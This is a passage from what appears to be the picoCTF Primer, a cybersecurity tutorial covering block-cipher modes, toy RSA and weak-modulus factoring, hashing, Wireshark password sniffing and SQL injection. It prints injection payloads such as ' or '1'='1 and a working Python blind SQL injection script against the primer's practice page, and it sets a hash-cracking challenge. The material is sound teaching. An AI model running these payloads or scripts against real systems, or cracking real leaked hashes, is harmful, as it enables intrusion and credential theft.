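    # ECB mode: split the plaintext into 16-byte blocks and
    # encrypt each block independently.
    out = b""
    for i in range(0, len(plaintext), 16):
        out += toy_block_encrypt(key, plaintext[i:i + 16])
    return out

key = b"secret key"
# Two identical plaintext blocks...
ciphertext = toy_ecb_encrypt(key, b"A" * 16 + b"A" * 16)
# ...come out as two identical ciphertext blocks, leaking structure:
print(ciphertext[:16] == ciphertext[16:])  # True
```

This repeating-block pattern is exactly why the penguin's outline survives encryption.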
Suppose you are sending an encrypted text and you know that the first 128 bits contain a name and the second 128 bits contain a date. Imagine that you are an attacker that captures some encrypted messages on different dates. Even if you do not know the key, you might be able to interchange the second block of the messages to tamper with the date. To understand this better let's look at an example. Suppose you intercept a message sent on May 1, and after some days you intercept another message on May 8. Imagine you want to make the receiver think that the second message is from May 1. You could simply replace the blue block by the red block.

Another problem of ECB is that if you send the same message twice, any attacker can see that the same message is being sent again. A secure encryption algorithm should not leak any information about the message. Knowing that the same message was sent in the past can be used to learn details about the communication. It is recommended to never use ECB.

##### Operation mode CBC

A more secure operation mode is CBC, which means Cipher Block Chaining. In this mode we include additional elements. The first one is the initialization vector, a random value with the same size as a block. In AES, the block size is always 128 bits (so in AES 128 it matches the key size). Remember that in AES we must separate the cleartext into blocks of the block size. Before starting the encryption, we do XOR between the first block of cleartext and the Initialization Vector, then we begin to encrypt using AES with the key of our choice. The initialization vector is different for every message, so if we send the same message twice, the ciphertext will be different due to the initialization vector. We must attach the initialization vector to the message. Another element we add in this operation mode is that we do not encrypt blocks independently; we take the encrypted text from one block and XOR it with the next block of cleartext we want to encrypt.
Then, we use AES and the key to encrypt that result. The following image shows a graphical representation of what was just explained; note that the circle with the cross means XOR:

In AES, the cleartext must be a multiple of the block size. For example, if you have a cleartext that happens to be shorter than a block, you need to add padding to the cleartext so it matches at least one block. In a case where the cleartext is larger than one block, but smaller than two, you need to add padding to the cleartext until it is the same size as two blocks. In AES there is a common way of padding, which is a standard called PKCS #7. In AES 128, as we said previously, the block size is 128 bits, which is equivalent to 16 bytes. Suppose you want to encrypt the message

"HELLOPICOCTF"

Since that message is 12 bytes, we need to add 4 bytes of padding to complete the size of a block. In PKCS#7, each padding byte has as its value the number of bytes you need to pad. In our example, since we need to pad 4 bytes to complete 16 bytes, we would pad like this:

"HELLOPICOCTF"+"\x04\x04\x04\x04"

Note that "\x" is a way to say that in a string we want that exact number in a byte, even if it is not printable ASCII. Now, suppose we want to encrypt a message of 15 bytes like:

"GOODBYEPICOCTF!"

After we pad it using PKCS#7, the result is:

"GOODBYEPICOCTF!"+"\x01"

What would be the result after padding the message "BYEPICOCTF"?

…

If you answered:

"BYEPICOCTF"+"\x06\x06\x06\x06\x06\x06"

You are correct.

#### 6.5.2. Asymmetric crypto example: RSA

Remember that asymmetric crypto means that we use one key for encrypting (the public key) and another key for decrypting (the private key). Suppose you want to communicate secretly with asymmetric crypto. In that case, you generate a public and private key pair. Then, give the public key to anyone that wants to send you an encrypted message.
They will encrypt the message using your public key, and when you receive the encrypted message, you are the only one that can decrypt it, because you are the only one that has the private key. That's why it is called "private". Note that your public key can be of public knowledge and no one would be able to decrypt the message. If you want to send an encrypted message to someone, that person would have to give you their public key. A very widely used algorithm for asymmetric cryptography is RSA. It is called RSA because of its inventors: Ronald **R**ivest, Adi **S**hamir, and Leonard **A**dleman. To understand how it works, we will encrypt and decrypt using the RSA algorithm with a public-private key pair that was generated for this example; it will seem a bit magical. After that, we will understand some concepts, learn to generate keys, and encrypt and decrypt with the generated keys.

Before encrypting, you need to understand how the modulo operation works, if you do not know already. It is actually very simple. The modulo operation finds the remainder after division of one number by another. For example, 8 mod 3 = 2, because 3 fits in 8 two times, and we have a remainder of 2. Since RSA uses very basic arithmetic, we are ready to see the example. In RSA, the public key is a pair of numbers, as well as the private key. The message can be anything that we can represent as a number. In a computer, everything is a number as we know. The encrypted text, also called ciphertext, will be another number. In summary, this is what we need in RSA to encrypt and decrypt:

RSA public key: Is a pair of numbers (e,n)

RSA private key: Is a pair of numbers (d,n)

Message: m

Ciphertext: c

To encrypt: m^e mod n = c

To decrypt: c^d mod n = m

Basically, 'd' is the private value of the private key, since 'n' is also in the public key. As you just saw, the formulas are very simple. To encrypt a message, you simply take the message to the power of 'e', and then do modulo 'n'.
To decrypt, take the ciphertext to the power of 'd', and then do modulo 'n', and that results in the original message. In this example the numbers of the keys are very small, which is insecure in real life. RSA is only secure when large values are used. As of 2019, RSA is considered secure only if the key is a number that takes at least 2048 bits, which is roughly **617 digits**. This is how it looks as a 617 digit number:

`639792933441952154134189948544473456738316249934191318148092777710386387734317720754565453220777092120190516609628049092636019759882816133231666365286193266863360627356763035447762803504507772355471058595487027908143562401451718062464362679456127531813407833033625423278394497538243720583531147711992606381334677687969597030983391307710987040859133746414428227726346594704745878477872019277152807317679077071572134447306057007334924369311383504931631284042512192565179806941135280131470130478164378851852909285452011658393419656213491434159562586586557055269049652098580338507224264829397285847831630577775606888764`

This is certainly a very big number. However, to understand how it works it is a good idea to use small numbers. Let's look at an example:

Public key (e,n) → (11,117)

Private key (d,n) → (35,117)

Message m → 10

So far, we have a public key with e=11, and a private key with d=35. Our message is 10. To encrypt 10, we do:

10^11 mod 117

The result of that is 82. So, we have:

10^11 mod 117 = 82

Ciphertext → 82

Now, for decrypting, we do:

82^35 mod 117 = 10

Cleartext → 10

That was a bit magical. The RSA private and public keys are generated with steps that make them have this property. The process of key generation is relatively simple. We only need to understand some parts of it to show our attack. Note that "In number theory, two integers a and b are said to be relatively prime, mutually prime, or coprime (also written co-prime) if the only positive integer (factor) that divides both of them is 1.
Consequently, any prime number that divides one does not divide the other. This is equivalent to their greatest common divisor (gcd) being 1"[1]. The multiplicative inverse is a number that we multiply by another number to obtain 1 as a result. For example, in non-integer arithmetic (in RSA we only use integer arithmetic) the multiplicative inverse of 8 is 1/8, because 8 * 1/8 = 1. However, in integer arithmetic we don't have fractions. But we can have a multiplicative inverse modulo n, which means that if we have a number, multiply it by its multiplicative inverse, and take modulo n, the result will be 1. For example, the multiplicative inverse of 3 modulo 4 is 3. Why? Because if you multiply 3*3, that results in 9, and 9 modulo 4 is 1. Now you are ready to see the key generation without getting lost. This is it:

- Generate two large co-prime numbers, p and q.
- Find n = pq and phi = (p-1) (q-1)
- Select e such that 1 < e < phi, and e is coprime with phi
- Find d, which is the multiplicative inverse of e modulo phi.
- The couple (e, n) is the public key
- The couple (d, n) is the private key

It is relatively simple! To find a multiplicative inverse, you can use the Extended Euclidean Algorithm (EEA). It is easy to find an online implementation of it with a google search. Remember our example in which we had this key pair?

Public key (e,n) → (11,117)

Private key (d,n) → (35,117)

That was generated in the same manner. First, we picked two coprime numbers. The numbers of our choice were:

p=13

q=9

They are coprime, because their greatest common divisor is 1. Then

n=13*9=117

phi=(13-1)(9-1)=96

To pick e, we arbitrarily pick a number that is greater than 1 and less than phi, and is coprime with phi. The number 11 complies with those requirements. So e=11. Now, we obtain 'd' by applying the EEA. We can do that on this website:

We input 11 and 96 in the following manner:

And the result we want is 35.
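If you prefer to compute the inverse locally instead of using a website, Python's built-in pow can do it: the three-argument form computes modular exponentiation, and since Python 3.8 an exponent of -1 gives the modular inverse. This also lets us verify the whole example:

```python
e, phi = 11, 96
d = pow(e, -1, phi)   # multiplicative inverse of e modulo phi (Python 3.8+)
print(d)              # 35

n, m = 117, 10
c = pow(m, e, n)      # encrypt: m^e mod n
print(c)              # 82
print(pow(c, d, n))   # decrypt: c^d mod n gives back the message, 10
```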
Now we have:

d=35

With those results, we know the private and public keys are:

Public key (e,n) → (11,117)

Private key (d,n) → (35,117)

**Exercise**: Create your own public and private key, and use them to encrypt and decrypt a two digit number!

##### Attacking RSA

RSA can be easily broken if it has a small 'n'. This does not happen often in real life, unless a programmer decides to implement their own version of RSA. A programmer should not make their own implementations of cryptography; it is a general rule to use libraries tested by industry. The security of RSA is based on the fact that there is no efficient algorithm to factorize a large 'n', so an attacker is not able to generate the private key from the public key. If 'n' is too small, it is possible to factorize it. We are going to see how to break RSA by recovering the private key from the public key. In real life, the public key comes in a digital certificate, which is a package that contains data related to the owner of the public key along with the public key itself. Digital certificates are often encoded in base64, which is a way of encoding binary data as printable text.
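Base64 itself is easy to experiment with from Python (a quick illustration, unrelated to any particular certificate):

```python
import base64

# Encode arbitrary bytes as printable text...
encoded = base64.b64encode(b"picoCTF")
print(encoded)  # b'cGljb0NURg=='

# ...and decode it back to the original bytes:
print(base64.b64decode(encoded))  # b'picoCTF'
```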
The following is an example of a digital certificate encoded in base64: ``` -----BEGIN CERTIFICATE----- MIIB6zCB1AICMDkwDQYJKoZIhvcNAQECBQAwEjEQMA4GA1UEAxMHUGljb0NURjAe Fw0xOTA3MDgwNzIxMThaFw0xOTA2MjYxNzM0MzhaMGcxEDAOBgNVBAsTB1BpY29D VEYxEDAOBgNVBAoTB1BpY29DVEYxEDAOBgNVBAcTB1BpY29DVEYxEDAOBgNVBAgT B1BpY29DVEYxCzAJBgNVBAYTAlVTMRAwDgYDVQQDEwdQaWNvQ1RGMCIwDQYJKoZI hvcNAQEBBQADEQAwDgIHEaTUUhKxfwIDAQABMA0GCSqGSIb3DQEBAgUAA4IBAQAH al1hMsGeBb3rd/Oq+7uDguueopOvDC864hrpdGubgtjv/hrIsph7FtxM2B4rkkyA eIV708y31HIplCLruxFdspqvfGvLsCynkYfsY70i6I/dOA6l4Qq/NdmkPDx7edqO T/zK4jhnRafebqJucXFH8Ak+G6ASNRWhKfFZJTWj5CoyTMIutLU9lDiTXng3rDU1 BhXg04ei1jvAf0UrtpeOA6jUyeCLaKDFRbrOm35xI79r28yO8ng1UAzTRclvkORt b8LMxw7e+vdIntBGqf7T25PLn/MycGPPvNXyIsTzvvY/MXXJHnAqpI5DlqwzbRHz q16/S1WLvzg4PsElmv1f -----END CERTIFICATE----- ``` Copy that text into a text file on the webshell, and name it "weak_n_certificate". The first thing we must do to crack RSA with a weak n, is to extract the n from the certificate. Remember that n is the modulus and e is the exponent. 
You can use the following command to extract those values:

`openssl x509 -in weak_n_certificate -text -noout`

In this case,

n= 4966306421059967

e= 65537

As we can see in the output of the command:

```
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number: 12345 (0x3039)
        Signature Algorithm: md2WithRSAEncryption
        Issuer: CN = PicoCTF
        Validity
            Not Before: Jul 8 07:21:18 2019 GMT
            Not After : Jun 26 17:34:38 2019 GMT
        Subject: OU = PicoCTF, O = PicoCTF, L = PicoCTF, ST = PicoCTF, C = US, CN = PicoCTF
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (53 bit)
                Modulus: 4966306421059967 (0x11a4d45212b17f)
                Exponent: 65537 (0x10001)
    Signature Algorithm: md2WithRSAEncryption
         07:6a:5d:61:32:c1:9e:05:bd:eb:77:f3:aa:fb:bb:83:82:eb:
         9e:a2:93:af:0c:2f:3a:e2:1a:e9:74:6b:9b:82:d8:ef:fe:1a:
         c8:b2:98:7b:16:dc:4c:d8:1e:2b:92:4c:80:78:85:7b:d3:cc:
         b7:d4:72:29:94:22:eb:bb:11:5d:b2:9a:af:7c:6b:cb:b0:2c:
         a7:91:87:ec:63:bd:22:e8:8f:dd:38:0e:a5:e1:0a:bf:35:d9:
         a4:3c:3c:7b:79:da:8e:4f:fc:ca:e2:38:67:45:a7:de:6e:a2:
         6e:71:71:47:f0:09:3e:1b:a0:12:35:15:a1:29:f1:59:25:35:
         a3:e4:2a:32:4c:c2:2e:b4:b5:3d:94:38:93:5e:78:37:ac:35:
         35:06:15:e0:d3:87:a2:d6:3b:c0:7f:45:2b:b6:97:8e:03:a8:
         d4:c9:e0:8b:68:a0:c5:45:ba:ce:9b:7e:71:23:bf:6b:db:cc:
         8e:f2:78:35:50:0c:d3:45:c9:6f:90:e4:6d:6f:c2:cc:c7:0e:
         de:fa:f7:48:9e:d0:46:a9:fe:d3:db:93:cb:9f:f3:32:70:63:
         cf:bc:d5:f2:22:c4:f3:be:f6:3f:31:75:c9:1e:70:2a:a4:8e:
         43:96:ac:33:6d:11:f3:ab:5e:bf:4b:55:8b:bf:38:38:3e:c1:
         25:9a:fd:5f
```

Factorizing that n is easy. If you google "integer factorization online", the first result is this one:

Input the value of n in the text field on that website, and click the button factor. You will get the following:

That is correct, 67867967 and 73176001 happen to be 'p' and 'q' in the RSA public key. Having those two values, you are able to calculate the private key.

**Challenge**: what is the private key?

#### 6.5.3. Hashing

Imagine you want to download a big file from the internet.
However, after downloading, you want to check that every bit of the file is correct, and that nothing was changed by a transmission error or a malicious attacker. To do this, you can use a hash: a fixed-length string, obtained by applying a hash function to the file, that identifies that file. Whenever you apply the hash function to the file, you will get exactly the same hash, unless the file has been modified. If even one bit of the file changed, you would get a very different hash. So, using a hash, we can check the file's integrity.

There are several hash functions used in industry that are considered secure. One that is commonly used is SHA-2, which stands for "Secure Hash Algorithm 2", because it is the second version of SHA.

Let's look at an example. Open the webshell, create a file called "bio.txt", and copy-paste the following content (do not include the quotes and make sure there is no line break at the beginning or end):

"Charles Babbage KH FRS (26 December 1791 – 18 October 1871) was an English polymath. A mathematician, philosopher, inventor and mechanical engineer, Babbage originated the concept of a digital programmable computer."

Save it, and run the command "sha256sum" like this:

`sha256sum bio.txt`

As a result, you should get a hex string of 64 characters. For this particular text, you should get:

`338f1cefc564f86ecfc241310d35e31125bb14cff61c080f293be2ef24fb3a69`

That string is an identifier for the information contained in our file. If we make even a little change to the file, the hash will change completely. For example, create a new file called "bio2.txt" with the same data, but now without the dot at the end:

"Charles Babbage KH FRS (26 December 1791 – 18 October 1871) was an English polymath.
A mathematician, philosopher, inventor and mechanical engineer, Babbage originated the concept of a digital programmable computer"

Save it, and run the command "sha256sum" like this:

`sha256sum bio2.txt`

You should get:

`3e7e604c81440507f6140becfed1c3510bc49cc4745c938166b9979245215618`

Note that the hash is very different just because we removed one single dot. Now, add the dot back at the end of the file bio2.txt, and run "sha256sum" on that file. You should get the original hash that we got from "bio.txt", because the information contained in the file is the same.

If we store a file, calculate its hash, and keep the hash with us, we can tell whether the file was later modified by recalculating the hash and verifying that it matches the hash we kept. This is a very useful integrity measure. One caveat is that an attacker must not have access to the place in which the hash is stored; otherwise, the attacker could modify the file, recalculate the hash, and replace the stored hash, so we would not be able to tell that the file was modified.

Hashes are commonly used to store passwords in a database. When a user logs in, the hash of the password is calculated and compared with the stored hash. If they match, we know the user entered the correct password. A fundamental property of hashes is that it is computationally infeasible to recover the original text from the hash. Because of this, a system administrator is not able to learn the actual passwords of users even with access to the database. In the case of a data breach, when a database is leaked, attackers are not able to directly obtain the real passwords of users.

How can a hash be attacked? In the case of passwords, an attacker can create a table that maps several passwords to their hashes by calculating the hash of many words, for example all the words in an English dictionary.
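Such a lookup table is only a few lines of Python with the standard hashlib module. This sketch uses a tiny hypothetical word list; a real attack would load a huge list such as "rockyou":

```python
import hashlib

def sha256_hex(word):
    # hex digest of the SHA-256 hash of a word
    return hashlib.sha256(word.encode()).hexdigest()

# Hypothetical tiny dictionary; real attackers use millions of candidates.
words = ["hello", "password", "123456", "letmein"]
table = {sha256_hex(w): w for w in words}

# A leaked hash (this one is simply the SHA-256 of "hello").
leaked = "2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824"
print(table.get(leaked, "not in dictionary"))   # hello
```

Building the table once lets the attacker look up any number of leaked hashes instantly.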
In that way, if the attacker finds a hash of a password in the database, and the password was a word present in an English dictionary, it is possible to map it back to the original password by looking it up in the table. However, if a user picked a secure password, this attack would not work, because a complex password would not be in a dictionary. Note that there are lists of commonly used passwords which contain words in several languages and modifications of them, for example "Hello_12345". A secure password should be made of random characters to prevent this attack.

**Challenge**: The following hash of a password was leaked from a database, and you know the user did not use a strong password.

cd0894152aa5eec36ec79eb2bcb90ca40f056804530f40732b4957a496b23dc8

Search on Google for the password list called "rockyou" and hash its entries to find the password that corresponds to the leaked hash! Hint: you can use Python to generate hashes. The hashing algorithm is SHA256.

## 7. The Network

##### Samuel Sabogal Pardo

A network is made up of several connected computers. They can be connected through different protocols. A protocol is a set of rules that allows two computers in a network to send and receive information. That set of rules is essential to understand what information is coming from what source, or how to send information to a particular computer in the network. To sniff traffic in a network, we will be using a tool called Wireshark, which can show the packets transmitted on a network; from insecure connections, we can even recover passwords. But first, we will briefly explain some important things so you roughly understand the composition of a packet and can extract the parts you need. When you access a browser and visit a web site, the information of the web site is downloaded in packets. Today's Internet is fast, and you might feel that the website appears all at once. But if you download a big file, you can see that it takes some time.
This happens because the file is broken down into packets that are received by your computer and accumulate until all of them have arrived and form the whole file when the download completes. Each packet contains a piece corresponding to each layer. Review the layers here: Network Layers.

### 7.1. Sniffing and attack example

With a tool called Wireshark, we can "sniff" the packets transmitted on a network. The technical term for a tool like Wireshark is "sniffer". Go here for instructions on installing Wireshark if you have not already: Installing Wireshark. Once you install and open it, you should see a window similar to this:

That is the list of devices you can sniff. In this case, we want to sniff the network card you are using to connect to the internet. If you are connected to WiFi, you should select the one that is called "WiFi". In case you are connected to the Internet using an Ethernet cable, you should select "Ethernet". Then, click the "start capture" button on the upper left side, which is circled in the following image:

The capture now starts. If you have applications running on your computer or websites open in your browser, you will probably see several packets immediately; let the Wireshark window continue capturing. In your browser, navigate to the following link:

You should see the following page:

Now come back to the Wireshark window. What we want to do now is find the packets that were sent and received by your computer when you accessed the link. If there are too many packets from all the connections on your computer, this task would be too hard without the help of a Wireshark filter. A Wireshark filter allows you to tell Wireshark that you only want to see some specific packets. You can filter by protocol, IP, strings present in your request, or anything that helps you find what you are looking for faster. When we accessed the link in the browser, we made an HTTP request.
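An HTTP request is just plain text, which is exactly why a sniffer can read it. The following sketch only builds the text of a request in Python so you can see what travels in the packet payload (the host and path are hypothetical; nothing is sent over the network here):

```python
# The raw text a browser sends for a simple page load.
# Header lines are separated by CRLF; a blank line ends the headers.
request = (
    "GET /some/page HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "Connection: close\r\n"
    "\r\n"
)
print(request)
```

When you inspect the "Hypertext Transfer Protocol" layer in Wireshark, you are looking at exactly this kind of text.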
We can filter HTTP requests by simply typing http in the filter text field and pressing enter. The following image shows the results; the text field you have to type in is circled in red:

Right below that text field is the packet list. We can see two packets. The first one is the request your browser sent to the server asking for the web page, so naturally it has your IP as the source and the IP of the server as the destination. The second packet is the reply, which has your IP as the destination and the IP of the server as the source, because now the server is sending the page to you after you requested it. In the lower part of the window, we can see the information related to all the layers we explained previously for the currently selected packet.

Now, we will send a user and password to the web site. This page in particular does not do anything after you send a password; it just receives it. The important thing is that we can see the password in Wireshark when we send it. In the web page, type the following as user and password respectively:

picouser

picopassword

In Wireshark, you should now see two more packets: one in which you send the user and password, and the reply of the server. Note that the reply of the server is the same page; as we said, this page does nothing. So far, we have 4 packets, and the third one is the one in which you send the user and password! Click the third packet, and in the lower part of the window where the layers are visible, click "Hypertext Transfer Protocol". Note that at the end we can see:

&password=picopassword

We just found the password we sent using sniffing. A fundamental thing to note is that we were able to do this because the website was using HTTP, instead of HTTPS, which is encrypted. Encryption prevents us from understanding the contents of a packet. Additionally, we are always able to sniff the network card of our own computer.
However, if we want to sniff packets from other devices connected to the same WiFi, we must do additional things, because the WiFi could be using encryption. We encourage you to use a second device, which can be a smartphone, to access the web page and send a password. Then, on your computer, use Wireshark to capture the password sent, but first you need to do two things:

Enable monitor mode in Wireshark: Stop any packet capture you are doing and open the capture dialog, which is located in the upper part of the window, then click "options". Choose the WiFi interface and check "monitor" as in the following image:

When monitor mode is enabled and you are capturing packets, you will not be able to navigate the Internet on your computer. To be able to navigate again, disable monitor mode by unchecking the checkbox.

Decrypt the WiFi connection: You can do this only if you have the password for the WiFi you are sniffing. In the following link there is a very good article that explains how to do it:

Note that WiFi encryption is encryption at the data link layer, which is different from the encryption provided by HTTPS, which is at the application layer. Even if you decrypt the WiFi connection, if a website is using HTTPS, you will not be able to see anything from that website in Wireshark.

## 8. Infiltrating in a database

##### Samuel Sabogal Pardo

### 8.1. SQL

SQL is used to create and manipulate a very common type of database called a relational database. SQL stands for Structured Query Language. With it you can create tables in a database, store data in them, and run different queries that let you extract and analyze data. We are going to see some examples in a relational database management system (RDBMS) called MySQL. Once you learn the basics of SQL in one RDBMS, it is easy to apply them in others. We are going to see a very quick introduction so you are able to understand the hacks. Let's begin. As we said, information is stored in tables.
The following is an example of a table that we might call "user":

| Id | Name | Last Name | Phone | Password |
|---|---|---|---|---|
| 1 | Jane | Doe | 200 111 1111 | 123456 |
| 2 | Arpit | Gupta | 200 111 1111 | hello |
| 3 | Melania | Clinton | 201 333 3333 | password |

The passwords in this table are just an example. In real life, you should never store passwords directly in the database, as you learned in the crypto section. Additionally, you should never use passwords like those; they are far too weak.

There are several online tools, easy to find on Google, for practicing SQL. For example, access the following web site:

We can execute MySQL statements online, so let's create our table from the previous example on it. First, delete the code present in the editor. You should be seeing something like this:

Now, you can create the table using the following statement:

create table user (id integer, name text, lastname text, phone text, password text);

Analyze the statement carefully. This statement creates a table called "user" with five columns. The first column is "id" and has the data type integer. The other columns are "name", "lastname", "phone", and "password", which are of data type text. In an integer column, as you might guess, you can only store integers; in a text column, you can store strings. Put that statement in the SQL editor and hit the button "Run". If it is successful, you will see a green bar on top of the editor with the label "success". When you create tables in SQL, they are stored and remain available for future inserts. However, in this online editor tables only survive a single run, so the same script will have to create the table, insert the data, and query the data. So far we have created the table, but it is empty.
To insert a row, add the following statement:

insert into user (id, name, lastname, phone, password) values (1, 'Jane', 'Doe', '200 111 1111', '123456');

As you can see, the statement is self-explanatory. It inserts each of those values into the corresponding column of user, forming a new row. Hit run, and verify it was successful. It should look like this:

Now, add the following line, which queries the data you have inserted so far:

select * from user;

The * means that you want to see the content of all the columns. Hit Run. You can see the results at the end. Now insert the two missing rows to complete our 3-row table. If you are interested in returning only some particular columns, you can list them instead of using the *. For example, let's return only the name and lastname:

select name, lastname from user;

You will see:

We can make our query more granular if we add a "where" clause like this:

select * from user **where id=2**;

Look at the query carefully. We already know that the * means we want to see the content of every column. In the 'where' clause we restrict which rows we want to return. Which row do you think that query is going to return? If you thought of this row:

| 2 | Arpit | Gupta | 200 111 1111 | hello |

you were right. That is because that row is the one with the value 2 in its id. You could filter by any other field. If you are filtering a field of type text, you have to enclose the value in single quotes. Remove the previous select statement, and add:

select * from user where phone='200 111 1111';

You should be seeing the following:

Run it. If you look at the rows we inserted, 'Jane Doe' has the same phone number as 'Arpit Gupta'. The select statement should return 2 rows like this:

We can also filter by two fields in the same query using the logical operator 'and' in the following manner:

select * from user where phone='200 111 1111' and name='Jane';

After the "where" clause, you can put several boolean expressions.
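If you want to experiment locally instead of in the online editor, the statements used so far can be replayed with Python's built-in sqlite3 module (a stand-in for MySQL; the syntax of these simple statements is identical in both):

```python
import sqlite3

conn = sqlite3.connect(":memory:")   # throwaway in-memory database
cur = conn.cursor()

# The same table and rows as in the examples above.
cur.execute("create table user (id integer, name text, lastname text, phone text, password text)")
cur.execute("insert into user (id, name, lastname, phone, password) values (1, 'Jane', 'Doe', '200 111 1111', '123456')")
cur.execute("insert into user (id, name, lastname, phone, password) values (2, 'Arpit', 'Gupta', '200 111 1111', 'hello')")
cur.execute("insert into user (id, name, lastname, phone, password) values (3, 'Melania', 'Clinton', '201 333 3333', 'password')")

# A where clause with two boolean expressions joined by 'and'.
rows = cur.execute("select * from user where phone='200 111 1111' and name='Jane'").fetchall()
print(rows)   # [(1, 'Jane', 'Doe', '200 111 1111', '123456')]
```

An in-memory database disappears when the script ends, which mirrors the single-run behavior of the online editor.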
As you learned previously in the programming chapter, when you use "and", both expressions have to be true for the whole expression to be true. The query should return this:

Now, add another 'and' operator, to try to filter using a name that does not exist in the table:

select * from user where phone='200 111 1111' and name='Jane' and name='Mario';

The query should return no results, because 'Mario' does not exist in our database:

Now, as an experiment, add another filter, but this time use "or" instead of "and". For example, run:

select * from user where phone='200 111 1111' and name='Mario' or name='Arpit';

You will see:

What happened here? Analyze the query carefully. You know there is no one called Mario in our table. Why in the world does the query return a row? If you think about it, any expression, no matter how long, that results in false becomes true once you "or" it with something that is true. For example:

1=2 and 3=5 and 45=1 or 1=1

will be true, because (1=2 and 3=5 and 45=1) is false, but (1=1) is true. This is fundamental for the basic SQL injection attack. Try the following:

select * from user where phone='200 111 1111' and name='Mario' **or 1=1**;

You just returned all the results! That happens, as you might guess, because "1=1" is always true. As an exercise, create a new table with new data and write new queries.

### 8.2. Basic SQL injection

The objective of the basic SQL injection we are learning is to inject an "or" expression that is always true, so that the query the server code constructs from the user input deceives the program into returning the whole table. That happens when a program concatenates strings to construct a query in the server code. The following is an example in PHP:

"SELECT * FROM user where name='".$name."' and password='".$password."';"

The literal parts of the query will be concatenated with the values of the variables to form the final query.
Let's suppose that $name is equal to "samuel" and $password is equal to "hello"; the query would result in:

SELECT * FROM user where name='samuel' and password='hello';

What would happen if the password contains a single quote? That might break the syntax of the SQL query. Even worse, it could be used to inject your own SQL. For example, if the value of $password is:

**' or '1'='1**

the resulting query would be:

SELECT * FROM user where name='samuel' and password='' **or '1'='1**';

which is a perfectly valid query that will return the whole table. Use what you just learned here to return all the users:

This kind of vulnerability is rarely present in applications. One that is more common is the blind SQL injection.

### 8.3. Blind SQL injection

With this kind of vulnerability, the application does not return the data to you. However, it is enough that the application shows a message saying that no data was found, or that an error has occurred, to figure out the content we are looking for. To illustrate this, we are going to attack the following page:

If we input our previous injection in the password field:

**' or '1'='1**

we will see that the application found something and shows the message "REGISTER FOUND":

Internally, the injection deceives the application into returning records, but the application does not show us those records. That is why it is called blind SQL injection: we can inject SQL, but we cannot see the result! What can we do about this? We will inject SQL that guesses one character of a field at a time. Suppose we want to guess the first character of the password. If we do not guess it, the application will return "NOTHING FOUND". If we guess it, it will return "REGISTER FOUND". Note that being able to guess one character at a time is fundamental; trying to guess a whole string at once is much harder. Suppose a word is made up of a combination of the 26 characters of the alphabet.
To guess only the first letter, we only have to try 26 values. However, guessing the whole word at once is much more complicated. To illustrate this, suppose we have a word of two letters. If we can guess one letter at a time, we need at most 26 trials for the first one and 26 trials for the second one, for a total of 52 trials. On the other hand, if we try to guess both letters at the same time, we need 26*26 trials, which is 676 trials, because of all the possible combinations. If we add more characters, guessing the whole word becomes much harder, because there are far too many possible words. Nonetheless, guessing one letter at a time remains only 26 trials per letter. Blind SQL injection is based on that fact: it injects a query that compares only one character at a time. To be able to do that, you need to know the name of the column you are trying to guess. This is not that hard, because in many cases you can infer the name of the database column from the name of the HTML input. In other cases, you can leak the name when an error occurs inside the application and the error message shows the names of the columns. For the page we are attacking in this example, the names are the same as the HTML inputs. One column is called 'username', and the other one is called 'password'. So far, you know that if you inject:

**' or '1'='1**

it will return results, but you are not learning any information. We know two column names, 'username' and 'password'. For this example, suppose you know a user called 'picoctf' and you want to get the password of that user. To narrow down the query to the row in which the user 'picoctf' information is stored, you could use:

**' or username='picoctf**

Note that we do not use the **'1'='1** anymore, because we want a statement that filters only one user.
If you inject this in the password field of the web page, you will still see:

Remember that in our injection, if the part at the right of the "or" is true, the query returns results. And username is equal to 'picoctf' only in the row of the user picoctf! Now we will add the part that compares the first character of the password. We can do that using an embedded query, which is a query inside a query. Our embedded query will simply return the first character of the password. We compare that first character with the character 'a', so we are guessing that the first character is 'a':

**' or username='picoctf' and (select substr(password, 1, 1))='a**

If you inject this, you will see that nothing is found:

This is because we did not guess the first character. If you keep trying different characters, you will find that the first character of the password is 'f', when you inject this:

**' or username='picoctf' and (select substr(password, 1, 1))='f**

and see this as a result:

You could possibly find the whole password manually, but it would take too much effort. On the other hand, you may want to obtain all the passwords in the database, or even all the fields in the database! This same process can be applied to any field. In most SQL engines there is a system table that contains the names of all tables and columns, so once we find a SQL injection we might be able to leak the whole database. For this exercise we will only obtain one password. To be more efficient, we will write a Python script that does the job for us. Suppose we found the name of the table in some way.
The script is the following:

```
import requests
from string import printable

accum = ""
for i in range(1, 41):  # substr positions in SQL start at 1
    for letter in printable:
        accum += letter
        r = requests.post("https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '" + letter + "'=( select substr(binary password," + str(i) + ",1) from pico_blind_injection where id=1 ) and ''= '")
        if 'NOTHING FOUND...' in r.text:
            accum = accum[:-1]  # wrong guess: drop the letter
            print("nope")
        else:
            print(f"We found the character: {letter}")
            break  # character found: move on to the next position
print(accum)
```

This script is just one of the many ways a blind SQL injection can be done. With your knowledge of Python and SQL, you should be able to understand the script if you read it carefully. Note the following:

- 'printable' is just a string with all the printable ASCII characters, and we iterate over them.
- 'binary' in the MySQL context is just a way to specify that we want case-sensitive comparisons. If we did not use it, we would not be able to tell whether a character is lowercase or uppercase.
- We are sending GET parameters to the web site. For this reason, we can encode them in the URL.
- We put **and ''= '** at the end of the injection so that the closing single quote added by the application ends up in a valid comparison.
- 'NOTHING FOUND…' is the message printed in the HTML, so if it is present in the response, a wrong letter was guessed.
- To clear your doubts, experiment in the SQL editor with similar queries, or add prints to the Python script to make sure you understand every part of it.

Depending on the SQL engine, there can be several ways to inject SQL. Even frameworks that handle queries for you might have vulnerabilities in some versions, or may be used incorrectly by developers. Keep up the good work!

## 9. Levels of Code

##### Jeffery John

Throughout this Primer, we have discussed programming languages like Python, JavaScript, SQL, PHP, and C.
We have tried to introduce these languages in the ways they are used most often in cybersecurity, but each can do many of the things that the others can do. It is just as possible to run a web server in Python as it is to write regular expressions in JavaScript. What does set these languages apart is the level of abstraction they provide. This is a concept that is important to understand when working with code, and especially when working with reverse engineering. Abstraction in programming is about how much the author has to think about the underlying hardware. To the end user, it is unlikely to matter or be noticed. For cybersecurity, we want to be conscious of what vulnerabilities may be hidden in these abstractions.

### 9.1. High-level Languages

